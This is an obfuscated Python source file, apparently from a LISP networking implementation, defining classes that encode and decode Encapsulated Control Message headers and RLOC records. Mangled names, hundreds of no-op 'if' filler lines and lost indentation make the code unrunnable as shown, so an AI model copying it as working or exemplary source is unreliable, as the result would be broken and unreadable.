if 62 - 62: IiII % OoooooooOO * OoO0O00 + OoO0O00 % Ii1I % iII111i
if 66 - 66: I1IiiI . OOooOOo - OoO0O00 % Oo0Ooo * o0oOOo0O0Ooo - oO0o
if 68 - 68: I11i - i11iIiiIii / o0oOOo0O0Ooo + ooOoO0o / I1IiiI
if 31 - 31: I1Ii111 . OoooooooOO . i1IIi
if 65 - 65: OoO0O00 . ooOoO0o
if 12 - 12: I1Ii111 + O0 - oO0o . IiII
if 46 - 46: IiII . ooOoO0o / iII111i
if 63 - 63: II111iiii - I1ii11iIi11i * II111iiii
if 92 - 92: OoO0O00 % ooOoO0o * O0 % iIii1I11I1II1 / i1IIi / OoOoOO00
if 67 - 67: I1Ii111 + I11i + I1Ii111 . OOooOOo % o0oOOo0O0Ooo / ooOoO0o
if 78 - 78: I1ii11iIi11i . O0
if 56 - 56: oO0o - i1IIi * O0 / I11i * I1IiiI . I11i
if 54 - 54: i11iIiiIii % i1IIi + Oo0Ooo / OoOoOO00
if 26 - 26: I11i . I1ii11iIi11i
if 55 - 55: OoOoOO00 * I1Ii111 % OoO0O00 - OoO0O00
if 34 - 34: O0 * OoO0O00 - oO0o - IiII * Ii1I . II111iiii
if 28 - 28: O0 % iII111i - i1IIi
if 49 - 49: ooOoO0o . I11i - iIii1I11I1II1
if 41 - 41: ooOoO0o * i11iIiiIii % ooOoO0o . oO0o
if 97 - 97: oO0o - iII111i + IiII . OoOoOO00 + iIii1I11I1II1
if 75 - 75: ooOoO0o + ooOoO0o . I1Ii111 % iII111i / iIii1I11I1II1 * iII111i
if 13 - 13: II111iiii * i11iIiiIii - i1IIi * OoO0O00 + i1IIi
if 43 - 43: O0 % oO0o * I1IiiI
if 64 - 64: II111iiii + i11iIiiIii
if 17 - 17: O0 * I1IiiI
if 40 - 40: iIii1I11I1II1 * iII111i % iIii1I11I1II1
if 39 - 39: i1IIi . Ii1I - Oo0Ooo
if 91 - 91: I1IiiI - OoooooooOO - OoooooooOO
if 69 - 69: iII111i * i11iIiiIii / i1IIi
LISP_UDP_PROTOCOL = 17
LISP_DEFAULT_ECM_TTL = 128
if 86 - 86: I1IiiI % I11i * O0 + i1IIi % I1Ii111
class lisp_ecm ( ) :
def __init__ ( self , sport ) :
self . security = False
self . ddt = False
self . to_etr = False
self . to_ms = False
self . length = 0
self . ttl = LISP_DEFAULT_ECM_TTL
self . protocol = LISP_UDP_PROTOCOL
self . ip_checksum = 0
self . source = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . dest = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . udp_sport = sport
self . udp_dport = LISP_CTRL_PORT
self . udp_checksum = 0
self . udp_length = 0
self . afi = LISP_AFI_NONE
if 97 - 97: II111iiii * OoOoOO00 - I1Ii111 / i11iIiiIii / OoOoOO00
if 25 - 25: Oo0Ooo / Oo0Ooo
def print_ecm ( self ) :
oOOo0ooO0 = ( "{} -> flags: {}{}{}{}, " + "inner IP: {} -> {}, inner UDP: {} -> {}" )
if 74 - 74: OOooOOo
lprint ( oOOo0ooO0 . format ( bold ( "ECM" , False ) , "S" if self . security else "s" ,
"D" if self . ddt else "d" , "E" if self . to_etr else "e" ,
"M" if self . to_ms else "m" ,
green ( self . source . print_address ( ) , False ) ,
green ( self . dest . print_address ( ) , False ) , self . udp_sport ,
self . udp_dport ) )
if 30 - 30: O0 . Ii1I / o0oOOo0O0Ooo + I1IiiI - O0
def encode ( self , packet , inner_source , inner_dest ) :
self . udp_length = len ( packet ) + 8
self . source = inner_source
self . dest = inner_dest
if ( inner_dest . is_ipv4 ( ) ) :
self . afi = LISP_AFI_IPV4
self . length = self . udp_length + 20
if 88 - 88: i11iIiiIii
if ( inner_dest . is_ipv6 ( ) ) :
self . afi = LISP_AFI_IPV6
self . length = self . udp_length
if 33 - 33: OoO0O00 + O0
if 20 - 20: o0oOOo0O0Ooo % I11i . ooOoO0o - i1IIi . O0
if 10 - 10: i1IIi
if 49 - 49: I1Ii111 - Ii1I . O0
if 46 - 46: OOooOOo
if 64 - 64: I1IiiI / OoOoOO00
iII = ( LISP_ECM << 28 )
if ( self . security ) : iII |= 0x08000000
if ( self . ddt ) : iII |= 0x04000000
if ( self . to_etr ) : iII |= 0x02000000
if ( self . to_ms ) : iII |= 0x01000000
if 6 - 6: i11iIiiIii - iII111i * i1IIi - iII111i
I1iiiIII11ii1i1i1 = struct . pack ( "I" , socket . htonl ( iII ) )
if 3 - 3: I1IiiI . I11i / I1ii11iIi11i
Ooo0oO = ""
if ( self . afi == LISP_AFI_IPV4 ) :
Ooo0oO = struct . pack ( "BBHHHBBH" , 0x45 , 0 , socket . htons ( self . length ) ,
0 , 0 , self . ttl , self . protocol , socket . htons ( self . ip_checksum ) )
Ooo0oO += self . source . pack_address ( )
Ooo0oO += self . dest . pack_address ( )
Ooo0oO = lisp_ip_checksum ( Ooo0oO )
if 2 - 2: IiII + I11i / iIii1I11I1II1 . i11iIiiIii . i1IIi * ooOoO0o
if ( self . afi == LISP_AFI_IPV6 ) :
Ooo0oO = struct . pack ( "BBHHBB" , 0x60 , 0 , 0 , socket . htons ( self . length ) ,
self . protocol , self . ttl )
Ooo0oO += self . source . pack_address ( )
Ooo0oO += self . dest . pack_address ( )
if 14 - 14: Oo0Ooo . O0 - oO0o - i11iIiiIii
if 8 - 8: I1IiiI / iIii1I11I1II1 / OoooooooOO / Oo0Ooo / ooOoO0o
IiII1iiI = socket . htons ( self . udp_sport )
OooOOOoOoo0O0 = socket . htons ( self . udp_dport )
I11iIi1i1I1i1 = socket . htons ( self . udp_length )
oOOoooo0o0 = socket . htons ( self . udp_checksum )
o0oOo00 = struct . pack ( "HHHH" , IiII1iiI , OooOOOoOoo0O0 , I11iIi1i1I1i1 , oOOoooo0o0 )
return ( I1iiiIII11ii1i1i1 + Ooo0oO + o0oOo00 )
if 80 - 80: I11i
if 26 - 26: II111iiii + I1IiiI . II111iiii - oO0o % OoO0O00
def decode ( self , packet ) :
if 1 - 1: OoO0O00 - II111iiii
if 75 - 75: Oo0Ooo - OoOoOO00 + oO0o % i1IIi * OOooOOo
if 56 - 56: OoOoOO00 / OoO0O00 / I1IiiI % OoooooooOO
if 39 - 39: I1IiiI + II111iiii * Oo0Ooo % Ii1I . o0oOOo0O0Ooo * oO0o
i1I1iii1I11II = "I"
Iiiii = struct . calcsize ( i1I1iii1I11II )
if ( len ( packet ) < Iiiii ) : return ( None )
if 42 - 42: Ii1I / Oo0Ooo
iII = struct . unpack ( i1I1iii1I11II , packet [ : Iiiii ] )
if 25 - 25: OoooooooOO % Ii1I * I1Ii111 * I11i + I1IiiI % I1ii11iIi11i
iII = socket . ntohl ( iII [ 0 ] )
self . security = True if ( iII & 0x08000000 ) else False
self . ddt = True if ( iII & 0x04000000 ) else False
self . to_etr = True if ( iII & 0x02000000 ) else False
self . to_ms = True if ( iII & 0x01000000 ) else False
packet = packet [ Iiiii : : ]
if 70 - 70: Ii1I + I1ii11iIi11i * I11i * i1IIi . I1Ii111
if 76 - 76: OoooooooOO * OoOoOO00 . OoooooooOO
if 46 - 46: ooOoO0o * o0oOOo0O0Ooo % II111iiii / I1Ii111
if 29 - 29: OoO0O00 - i11iIiiIii % Oo0Ooo % o0oOOo0O0Ooo
if ( len ( packet ) < 1 ) : return ( None )
oOoO0 = struct . unpack ( "B" , packet [ 0 : 1 ] ) [ 0 ]
oOoO0 = oOoO0 >> 4
if 30 - 30: oO0o - Ii1I % Ii1I
if ( oOoO0 == 4 ) :
Iiiii = struct . calcsize ( "HHIBBH" )
if ( len ( packet ) < Iiiii ) : return ( None )
if 8 - 8: IiII
O0O , I11iIi1i1I1i1 , O0O , iioOo0oo , oo00ooOOOo0O , oOOoooo0o0 = struct . unpack ( "HHIBBH" , packet [ : Iiiii ] )
self . length = socket . ntohs ( I11iIi1i1I1i1 )
self . ttl = iioOo0oo
self . protocol = oo00ooOOOo0O
self . ip_checksum = socket . ntohs ( oOOoooo0o0 )
self . source . afi = self . dest . afi = LISP_AFI_IPV4
if 54 - 54: I1ii11iIi11i + I1ii11iIi11i % iIii1I11I1II1
if 74 - 74: ooOoO0o . Oo0Ooo * Ii1I / Ii1I
if 45 - 45: iII111i - I11i
if 100 - 100: I11i + OoO0O00 + OoooooooOO * iIii1I11I1II1
oo00ooOOOo0O = struct . pack ( "H" , 0 )
II1iIIII1iI1 = struct . calcsize ( "HHIBB" )
iII1I1i = struct . calcsize ( "H" )
packet = packet [ : II1iIIII1iI1 ] + oo00ooOOOo0O + packet [ II1iIIII1iI1 + iII1I1i : ]
if 33 - 33: ooOoO0o . I1IiiI . i11iIiiIii % OoO0O00
packet = packet [ Iiiii : : ]
packet = self . source . unpack_address ( packet )
if ( packet == None ) : return ( None )
packet = self . dest . unpack_address ( packet )
if ( packet == None ) : return ( None )
if 72 - 72: I1ii11iIi11i / O0 % II111iiii / II111iiii
if 48 - 48: OOooOOo % OOooOOo / iIii1I11I1II1 - i11iIiiIii
if ( oOoO0 == 6 ) :
Iiiii = struct . calcsize ( "IHBB" )
if ( len ( packet ) < Iiiii ) : return ( None )
if 57 - 57: I11i / IiII * i1IIi + II111iiii . o0oOOo0O0Ooo
O0O , I11iIi1i1I1i1 , oo00ooOOOo0O , iioOo0oo = struct . unpack ( "IHBB" , packet [ : Iiiii ] )
self . length = socket . ntohs ( I11iIi1i1I1i1 )
self . protocol = oo00ooOOOo0O
self . ttl = iioOo0oo
self . source . afi = self . dest . afi = LISP_AFI_IPV6
if 11 - 11: II111iiii
packet = packet [ Iiiii : : ]
packet = self . source . unpack_address ( packet )
if ( packet == None ) : return ( None )
packet = self . dest . unpack_address ( packet )
if ( packet == None ) : return ( None )
if 66 - 66: Ii1I - I1IiiI . OoooooooOO * I1Ii111
if 16 - 16: IiII * OoO0O00 * i11iIiiIii - ooOoO0o
self . source . mask_len = self . source . host_mask_len ( )
self . dest . mask_len = self . dest . host_mask_len ( )
if 88 - 88: iIii1I11I1II1 / Ii1I * IiII / I1Ii111
Iiiii = struct . calcsize ( "HHHH" )
if ( len ( packet ) < Iiiii ) : return ( None )
if 31 - 31: O0 . I1IiiI
IiII1iiI , OooOOOoOoo0O0 , I11iIi1i1I1i1 , oOOoooo0o0 = struct . unpack ( "HHHH" , packet [ : Iiiii ] )
self . udp_sport = socket . ntohs ( IiII1iiI )
self . udp_dport = socket . ntohs ( OooOOOoOoo0O0 )
self . udp_length = socket . ntohs ( I11iIi1i1I1i1 )
self . udp_checksum = socket . ntohs ( oOOoooo0o0 )
packet = packet [ Iiiii : : ]
return ( packet )
if 8 - 8: OoOoOO00
if 99 - 99: iII111i
if 93 - 93: I1Ii111
if 39 - 39: Ii1I
if 10 - 10: OoOoOO00 . iIii1I11I1II1 / I1ii11iIi11i % iII111i / i11iIiiIii
if 14 - 14: i11iIiiIii % o0oOOo0O0Ooo * O0 % iIii1I11I1II1 . IiII - II111iiii
if 14 - 14: Ii1I % ooOoO0o - OoOoOO00
if 52 - 52: OoO0O00 / i1IIi - Ii1I
if 8 - 8: oO0o + ooOoO0o . I1ii11iIi11i . i1IIi / I1IiiI . IiII
if 8 - 8: i1IIi * O0
if 60 - 60: Oo0Ooo - II111iiii + I1IiiI
if 17 - 17: OoOoOO00 % I1IiiI
if 8 - 8: Oo0Ooo
if 49 - 49: OoOoOO00 * I11i - o0oOOo0O0Ooo / OoO0O00 * oO0o
if 51 - 51: ooOoO0o - iIii1I11I1II1 . I11i * OoOoOO00 + I1Ii111 * i1IIi
if 37 - 37: IiII * oO0o / OoooooooOO . OoO0O00
if 77 - 77: II111iiii + OoOoOO00 * OOooOOo
if 9 - 9: II111iiii - i11iIiiIii * o0oOOo0O0Ooo % OoO0O00 * i11iIiiIii / I11i
if 45 - 45: i11iIiiIii * iII111i - I1ii11iIi11i + ooOoO0o % iII111i
if 11 - 11: iIii1I11I1II1
if 48 - 48: iIii1I11I1II1 - Oo0Ooo
if 80 - 80: i1IIi
if 56 - 56: II111iiii - o0oOOo0O0Ooo
if 48 - 48: Oo0Ooo - I1ii11iIi11i - II111iiii . Ii1I . oO0o / iIii1I11I1II1
if 38 - 38: I1Ii111 % i11iIiiIii + Ii1I * ooOoO0o / I1Ii111
if 93 - 93: oO0o
if 60 - 60: I1Ii111 . oO0o / Oo0Ooo * ooOoO0o + OoOoOO00 - i1IIi
if 13 - 13: i11iIiiIii * oO0o / I11i * I1IiiI
if 31 - 31: iIii1I11I1II1 * Ii1I % OOooOOo . II111iiii
if 56 - 56: IiII / i11iIiiIii . o0oOOo0O0Ooo . oO0o - i11iIiiIii
if 23 - 23: I1ii11iIi11i * i11iIiiIii % ooOoO0o
if 47 - 47: iIii1I11I1II1 . OOooOOo / I11i % II111iiii
if 92 - 92: I1ii11iIi11i % i11iIiiIii
if 82 - 82: I1Ii111 * I1ii11iIi11i % Ii1I / o0oOOo0O0Ooo
if 28 - 28: iII111i % OoO0O00 - OOooOOo - Oo0Ooo
if 16 - 16: i11iIiiIii - i11iIiiIii . OoOoOO00 / i1IIi
if 76 - 76: O0 * OoO0O00 / O0
if 23 - 23: I1ii11iIi11i . iIii1I11I1II1 - i11iIiiIii / II111iiii
if 48 - 48: oO0o - II111iiii * I1IiiI
if 78 - 78: I1IiiI * i11iIiiIii * II111iiii
if 19 - 19: OoooooooOO * i11iIiiIii / O0 . I1IiiI % I11i
if 35 - 35: iIii1I11I1II1 + I1IiiI - ooOoO0o / Oo0Ooo * I1ii11iIi11i * Oo0Ooo
if 17 - 17: OoOoOO00
if 24 - 24: iIii1I11I1II1 / OOooOOo % OoooooooOO / O0 / oO0o
if 93 - 93: Oo0Ooo
if 5 - 5: iII111i
if 61 - 61: OOooOOo * OoO0O00 - O0
if 30 - 30: iIii1I11I1II1
if 14 - 14: o0oOOo0O0Ooo + Ii1I
if 91 - 91: OoooooooOO / oO0o + OoOoOO00
if 100 - 100: i1IIi
if 13 - 13: i1IIi . I1ii11iIi11i * o0oOOo0O0Ooo
if 31 - 31: i11iIiiIii % OoO0O00 . i11iIiiIii % oO0o - i1IIi
if 62 - 62: oO0o + oO0o . OoooooooOO
if 59 - 59: iIii1I11I1II1 . Oo0Ooo * I11i
if 29 - 29: Oo0Ooo - I1IiiI * I11i
if 58 - 58: i1IIi * Ii1I / ooOoO0o % iIii1I11I1II1
if 24 - 24: OoOoOO00 - o0oOOo0O0Ooo * I1IiiI . I11i / OoO0O00 * Ii1I
if 12 - 12: OoooooooOO % oO0o
if 92 - 92: ooOoO0o % OoO0O00 + O0 + OoOoOO00 / OoO0O00 * iIii1I11I1II1
if 79 - 79: O0
if 71 - 71: OoO0O00 - O0
if 73 - 73: iIii1I11I1II1
if 7 - 7: OoOoOO00
if 55 - 55: oO0o . OoO0O00 + iIii1I11I1II1 + OoOoOO00 / I1ii11iIi11i - O0
if 14 - 14: II111iiii - OoO0O00 - O0 * OoooooooOO / I1IiiI
if 3 - 3: I11i
if 46 - 46: I1ii11iIi11i * I1Ii111 - iIii1I11I1II1
if 25 - 25: II111iiii / OOooOOo + Oo0Ooo - iIii1I11I1II1 - OoOoOO00
if 97 - 97: OOooOOo . OOooOOo / I1ii11iIi11i + I1IiiI * i1IIi
if 53 - 53: O0
if 28 - 28: iII111i % OoO0O00 . OoO0O00 / IiII * Oo0Ooo * iII111i
if 49 - 49: I1IiiI / I1Ii111 * iII111i + I1IiiI % oO0o % ooOoO0o
if 27 - 27: OoO0O00 / iII111i . I1ii11iIi11i
if 71 - 71: OoO0O00 . i11iIiiIii . iIii1I11I1II1 + I1IiiI - o0oOOo0O0Ooo
if 34 - 34: iII111i
if 6 - 6: OoO0O00 . OoOoOO00 + I1ii11iIi11i
if 24 - 24: OoO0O00 . Ii1I
if 26 - 26: O0 * I1IiiI - OOooOOo * OoooooooOO * II111iiii % OoOoOO00
if 56 - 56: OOooOOo * i11iIiiIii % ooOoO0o * OoOoOO00 % Oo0Ooo * IiII
if 30 - 30: i1IIi + o0oOOo0O0Ooo - OoOoOO00 . OOooOOo
if 95 - 95: i1IIi . I11i + O0 . I11i - I11i / Oo0Ooo
if 41 - 41: OoooooooOO . OOooOOo - Ii1I * OoO0O00 % i11iIiiIii
if 7 - 7: Ii1I
if 16 - 16: IiII * o0oOOo0O0Ooo % II111iiii - II111iiii + ooOoO0o
if 55 - 55: OoO0O00 % OoOoOO00
if 58 - 58: Ii1I
if 17 - 17: OoO0O00 - oO0o % Oo0Ooo % oO0o * I1Ii111 / IiII
if 88 - 88: ooOoO0o . II111iiii * O0 % IiII
if 15 - 15: O0 % i1IIi - OOooOOo . IiII
if 1 - 1: I1IiiI
if 40 - 40: o0oOOo0O0Ooo % I11i % O0
if 88 - 88: o0oOOo0O0Ooo - oO0o
if 73 - 73: II111iiii
if 7 - 7: O0 / OoO0O00
if 90 - 90: iII111i % oO0o / iIii1I11I1II1
if 52 - 52: I1IiiI / o0oOOo0O0Ooo
if 20 - 20: I1Ii111 . I1IiiI - iIii1I11I1II1 / iII111i
if 46 - 46: I1Ii111 . i11iIiiIii
if 89 - 89: OoO0O00 - OOooOOo - i1IIi - OoO0O00 % iIii1I11I1II1
if 52 - 52: o0oOOo0O0Ooo * O0 + I1ii11iIi11i
if 83 - 83: I11i + OOooOOo - OoooooooOO
if 7 - 7: IiII % ooOoO0o / OoooooooOO / o0oOOo0O0Ooo + OoO0O00 - OoO0O00
if 15 - 15: i1IIi + OOooOOo / Ii1I
if 51 - 51: OOooOOo + O0
if 91 - 91: i11iIiiIii + o0oOOo0O0Ooo % OoO0O00 / oO0o - i1IIi
if 82 - 82: Ii1I . OoooooooOO + OoooooooOO % OoO0O00 % I1ii11iIi11i
if 65 - 65: Oo0Ooo . I11i
if 7 - 7: Oo0Ooo * II111iiii
if 11 - 11: OoOoOO00 % OoooooooOO
if 92 - 92: OoOoOO00 - iII111i * Ii1I - i1IIi
if 87 - 87: Ii1I * I1Ii111 + iIii1I11I1II1 * o0oOOo0O0Ooo * iIii1I11I1II1 . I11i
if 66 - 66: Ii1I / OoO0O00 . O0 . I11i % OoooooooOO / OOooOOo
if 49 - 49: I1IiiI * iII111i - OoO0O00 % Ii1I + Ii1I * I1Ii111
if 94 - 94: OoOoOO00 - I11i + Ii1I + OoOoOO00 + II111iiii
if 61 - 61: IiII + Ii1I / oO0o . OoooooooOO + iII111i
if 29 - 29: OOooOOo
if 69 - 69: oO0o % OoooooooOO * iII111i
if 58 - 58: oO0o / i11iIiiIii . OoOoOO00 % O0 / iIii1I11I1II1
if 50 - 50: I1Ii111 . I11i / O0 . I11i
if 91 - 91: i11iIiiIii . I1ii11iIi11i + I11i
if 67 - 67: I1ii11iIi11i * I1Ii111 * I1IiiI / I11i - IiII + oO0o
if 11 - 11: O0 + i1IIi / o0oOOo0O0Ooo * OoO0O00
if 64 - 64: i1IIi % IiII . ooOoO0o . iIii1I11I1II1 + OoO0O00 - iIii1I11I1II1
if 52 - 52: II111iiii - IiII
if 91 - 91: iIii1I11I1II1 + iII111i . I11i % i11iIiiIii - i11iIiiIii + I1IiiI
if 75 - 75: I1ii11iIi11i / I1IiiI - iIii1I11I1II1 / OoO0O00 * OOooOOo
if 73 - 73: OoooooooOO % IiII / I1Ii111 * I11i + i1IIi % i11iIiiIii
if 91 - 91: i11iIiiIii
if 6 - 6: O0 - iIii1I11I1II1 + I1Ii111 . o0oOOo0O0Ooo * i11iIiiIii
if 53 - 53: OOooOOo / I1IiiI / oO0o * OOooOOo / i1IIi - I1Ii111
if 71 - 71: O0 + Oo0Ooo % oO0o - o0oOOo0O0Ooo
if 82 - 82: iIii1I11I1II1
if 64 - 64: ooOoO0o + I1IiiI % OOooOOo + II111iiii
if 46 - 46: I1IiiI
class lisp_rloc_record ( ) :
def __init__ ( self ) :
self . priority = 0
self . weight = 0
self . mpriority = 0
self . mweight = 0
self . local_bit = False
self . probe_bit = False
self . reach_bit = False
self . rloc = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . geo = None
self . elp = None
self . rle = None
self . json = None
self . rloc_name = None
self . keys = None
if 72 - 72: iII111i
if 100 - 100: I1IiiI
def print_rloc_name ( self , cour = False ) :
if ( self . rloc_name == None ) : return ( "" )
oo0O0OOooO0 = self . rloc_name
if ( cour ) : oo0O0OOooO0 = lisp_print_cour ( oo0O0OOooO0 )
return ( 'rloc-name: {}' . format ( blue ( oo0O0OOooO0 , cour ) ) )
if 75 - 75: OoO0O00
if 24 - 24: Oo0Ooo % I11i . OoOoOO00 + IiII + OoOoOO00 - IiII
def print_record ( self , indent ) :
o0oooOoOoOo = self . print_rloc_name ( )
if ( o0oooOoOoOo != "" ) : o0oooOoOoOo = ", " + o0oooOoOoOo
Ii1IIIIiI11 = ""
if ( self . geo ) :
IiIIO0 = ""
if ( self . geo . geo_name ) : IiIIO0 = "'{}' " . format ( self . geo . geo_name )
Ii1IIIIiI11 = ", geo: {}{}" . format ( IiIIO0 , self . geo . print_geo ( ) )
if 20 - 20: Oo0Ooo . OoooooooOO % oO0o - OOooOOo
Oo = ""
if ( self . elp ) :
IiIIO0 = ""
if ( self . elp . elp_name ) : IiIIO0 = "'{}' " . format ( self . elp . elp_name )
Oo = ", elp: {}{}" . format ( IiIIO0 , self . elp . print_elp ( True ) )
if 59 - 59: iIii1I11I1II1 - oO0o / OoooooooOO + oO0o / OoOoOO00
II1I = ""
if ( self . rle ) :
IiIIO0 = ""
if ( self . rle . rle_name ) : IiIIO0 = "'{}' " . format ( self . rle . rle_name )
II1I = ", rle: {}{}" . format ( IiIIO0 , self . rle . print_rle ( False ,
True ) )
if 32 - 32: I1Ii111 * Ii1I / I1Ii111 . OoOoOO00 + I1ii11iIi11i - ooOoO0o
I1IiIii1Ii1I = ""
if ( self . json ) :
IiIIO0 = ""
if ( self . json . json_name ) :
IiIIO0 = "'{}' " . format ( self . json . json_name )
if 5 - 5: II111iiii / OoooooooOO % I1ii11iIi11i * I1IiiI * OoOoOO00
I1IiIii1Ii1I = ", json: {}" . format ( self . json . print_json ( False ) )
if 5 - 5: iIii1I11I1II1 . OoooooooOO
if 13 - 13: oO0o . o0oOOo0O0Ooo . i11iIiiIii * I1ii11iIi11i / ooOoO0o
I1i1Ii = ""
if ( self . rloc . is_null ( ) == False and self . keys and self . keys [ 1 ] ) :
I1i1Ii = ", " + self . keys [ 1 ] . print_keys ( )
if 12 - 12: IiII + ooOoO0o . i11iIiiIii - iIii1I11I1II1
if 27 - 27: I11i + iIii1I11I1II1
oOOo0ooO0 = ( "{}RLOC-record -> flags: {}, {}/{}/{}/{}, afi: {}, rloc: "
+ "{}{}{}{}{}{}{}" )
lprint ( oOOo0ooO0 . format ( indent , self . print_flags ( ) , self . priority ,
self . weight , self . mpriority , self . mweight , self . rloc . afi ,
red ( self . rloc . print_address_no_iid ( ) , False ) , o0oooOoOoOo , Ii1IIIIiI11 ,
Oo , II1I , I1IiIii1Ii1I , I1i1Ii ) )
if 71 - 71: OoOoOO00 + oO0o % OOooOOo * I1IiiI
if 89 - 89: Ii1I % I1Ii111 / Oo0Ooo * Ii1I + OoOoOO00
def print_flags ( self ) :
return ( "{}{}{}" . format ( "L" if self . local_bit else "l" , "P" if self . probe_bit else "p" , "R" if self . reach_bit else "r" ) )
if 5 - 5: Ii1I * I1IiiI + I1Ii111
if 22 - 22: Oo0Ooo . OoO0O00
if 55 - 55: Oo0Ooo % OoooooooOO * II111iiii % OoooooooOO
def store_rloc_entry ( self , rloc_entry ) :
I1IIiIIIii = rloc_entry . rloc if ( rloc_entry . translated_rloc . is_null ( ) ) else rloc_entry . translated_rloc
if 16 - 16: OoOoOO00 % i11iIiiIii - oO0o - Ii1I / Ii1I - oO0o
self . rloc . copy_address ( I1IIiIIIii )
if 22 - 22: i1IIi / OoO0O00 * I1IiiI - Oo0Ooo - Ii1I
if ( rloc_entry . rloc_name ) :
self . rloc_name = rloc_entry . rloc_name
if 80 - 80: ooOoO0o . i11iIiiIii
if 18 - 18: I11i + i11iIiiIii
if ( rloc_entry . geo ) :
self . geo = rloc_entry . geo
else :
IiIIO0 = rloc_entry . geo_name
if ( IiIIO0 and lisp_geo_list . has_key ( IiIIO0 ) ) :
self . geo = lisp_geo_list [ IiIIO0 ]
if 46 - 46: Ii1I * Ii1I
if 57 - 57: I1Ii111 + iIii1I11I1II1 + I1IiiI * I1Ii111 - OOooOOo
if ( rloc_entry . elp ) :
self . elp = rloc_entry . elp
else :
IiIIO0 = rloc_entry . elp_name
if ( IiIIO0 and lisp_elp_list . has_key ( IiIIO0 ) ) :
self . elp = lisp_elp_list [ IiIIO0 ]
if 97 - 97: I1ii11iIi11i
if 3 - 3: ooOoO0o + i11iIiiIii . iIii1I11I1II1
if ( rloc_entry . rle ) :
self . rle = rloc_entry . rle
else :
IiIIO0 = rloc_entry . rle_name
if ( IiIIO0 and lisp_rle_list . has_key ( IiIIO0 ) ) :
self . rle = lisp_rle_list [ IiIIO0 ]
if 70 - 70: ooOoO0o
if 3 - 3: I1IiiI - I1IiiI
if ( rloc_entry . json ) :
self . json = rloc_entry . json
else :
IiIIO0 = rloc_entry . json_name
if ( IiIIO0 and lisp_json_list . has_key ( IiIIO0 ) ) :
self . json = lisp_json_list [ IiIIO0 ]
if 89 - 89: OoOoOO00
if 27 - 27: i1IIi % OoOoOO00 / Ii1I * Ii1I / I11i
self . priority = rloc_entry . priority
self . weight = rloc_entry . weight
self . mpriority = rloc_entry . mpriority
self . mweight = rloc_entry . mweight
if 11 - 11: OOooOOo
if 58 - 58: OoO0O00 * OoooooooOO
def encode_json ( self , lisp_json ) :
II11iii = lisp_json . json_string
i1Ii1iiI = 0
if ( lisp_json . json_encrypted ) :
i1Ii1iiI = ( lisp_json . json_key_id << 5 ) | 0x02
if 23 - 23: Oo0Ooo % II111iiii
if 96 - 96: ooOoO0o % Ii1I
iI1IIiI111iII = LISP_LCAF_JSON_TYPE
OoOoO00OoOOo = socket . htons ( LISP_AFI_LCAF )
OooO0OO0o = self . rloc . addr_length ( ) + 2
if 46 - 46: Ii1I
oOOO0O000Oo = socket . htons ( len ( II11iii ) + OooO0OO0o )
if 14 - 14: OoO0O00 * OoooooooOO
iiiii1I = socket . htons ( len ( II11iii ) )
IiiiIi1iiii11 = struct . pack ( "HBBBBHH" , OoOoO00OoOOo , 0 , 0 , iI1IIiI111iII , i1Ii1iiI ,
oOOO0O000Oo , iiiii1I )
IiiiIi1iiii11 += II11iii
if 45 - 45: iIii1I11I1II1 * I1IiiI . OoOoOO00
if 97 - 97: I11i % II111iiii % Ii1I . II111iiii . iIii1I11I1II1
if 98 - 98: i11iIiiIii + O0 - O0 - iII111i
if 25 - 25: oO0o / O0 + I1Ii111 % i11iIiiIii / I1IiiI
if ( lisp_is_json_telemetry ( II11iii ) ) :
IiiiIi1iiii11 += struct . pack ( "H" , socket . htons ( self . rloc . afi ) )
IiiiIi1iiii11 += self . rloc . pack_address ( )
else :
IiiiIi1iiii11 += struct . pack ( "H" , 0 )
if 62 - 62: iII111i . I11i * i1IIi + iII111i
return ( IiiiIi1iiii11 )
if 95 - 95: Ii1I / o0oOOo0O0Ooo % ooOoO0o - I1IiiI / OOooOOo * OOooOOo
if 6 - 6: OoO0O00 % IiII + iIii1I11I1II1
def encode_lcaf ( self ) :
OoOoO00OoOOo = socket . htons ( LISP_AFI_LCAF )
IiIoOo0ooo = ""
if ( self . geo ) :
IiIoOo0ooo = self . geo . encode_geo ( )
if 26 - 26: I11i - i1IIi - Oo0Ooo * O0 * OOooOOo . OoooooooOO
if 99 - 99: oO0o . OoO0O00 / OOooOOo
Ii1111i = ""
if ( self . elp ) :
i1iiIiI = ""
for IIii in self . elp . elp_nodes :
O0ooo0 = socket . htons ( IIii . address . afi )
II111Ii1I1I = 0
if ( IIii . eid ) : II111Ii1I1I |= 0x4
if ( IIii . probe ) : II111Ii1I1I |= 0x2
if ( IIii . strict ) : II111Ii1I1I |= 0x1
II111Ii1I1I = socket . htons ( II111Ii1I1I )
i1iiIiI += struct . pack ( "HH" , II111Ii1I1I , O0ooo0 )
i1iiIiI += IIii . address . pack_address ( )
if 22 - 22: iIii1I11I1II1 % iIii1I11I1II1 . o0oOOo0O0Ooo
if 46 - 46: oO0o
I1Iiiii1i = socket . htons ( len ( i1iiIiI ) )
Ii1111i = struct . pack ( "HBBBBH" , OoOoO00OoOOo , 0 , 0 , LISP_LCAF_ELP_TYPE ,
0 , I1Iiiii1i )
Ii1111i += i1iiIiI
if 78 - 78: i1IIi % oO0o + IiII
if 75 - 75: O0 + I1ii11iIi11i
oo0oO0 = ""
if ( self . rle ) :
i1ii1i1Iii = ""
for Iii in self . rle . rle_nodes :
O0ooo0 = socket . htons ( Iii . address . afi )
i1ii1i1Iii += struct . pack ( "HBBH" , 0 , 0 , Iii . level , O0ooo0 )
i1ii1i1Iii += Iii . address . pack_address ( )
if ( Iii . rloc_name ) :
i1ii1i1Iii += struct . pack ( "H" , socket . htons ( LISP_AFI_NAME ) )
i1ii1i1Iii += Iii . rloc_name + "\0"
if 76 - 76: i1IIi
if 38 - 38: I1IiiI
if 15 - 15: o0oOOo0O0Ooo
ooOo = socket . htons ( len ( i1ii1i1Iii ) )
oo0oO0 = struct . pack ( "HBBBBH" , OoOoO00OoOOo , 0 , 0 , LISP_LCAF_RLE_TYPE ,
0 , ooOo )
oo0oO0 += i1ii1i1Iii
if 74 - 74: o0oOOo0O0Ooo % oO0o % iII111i / I1ii11iIi11i / O0 % I1Ii111
if 48 - 48: i11iIiiIii + I11i
oOoooo0 = ""
if ( self . json ) :
oOoooo0 = self . encode_json ( self . json )
if 79 - 79: OoOoOO00 * II111iiii + Ii1I + OOooOOo % I1IiiI * OoooooooOO
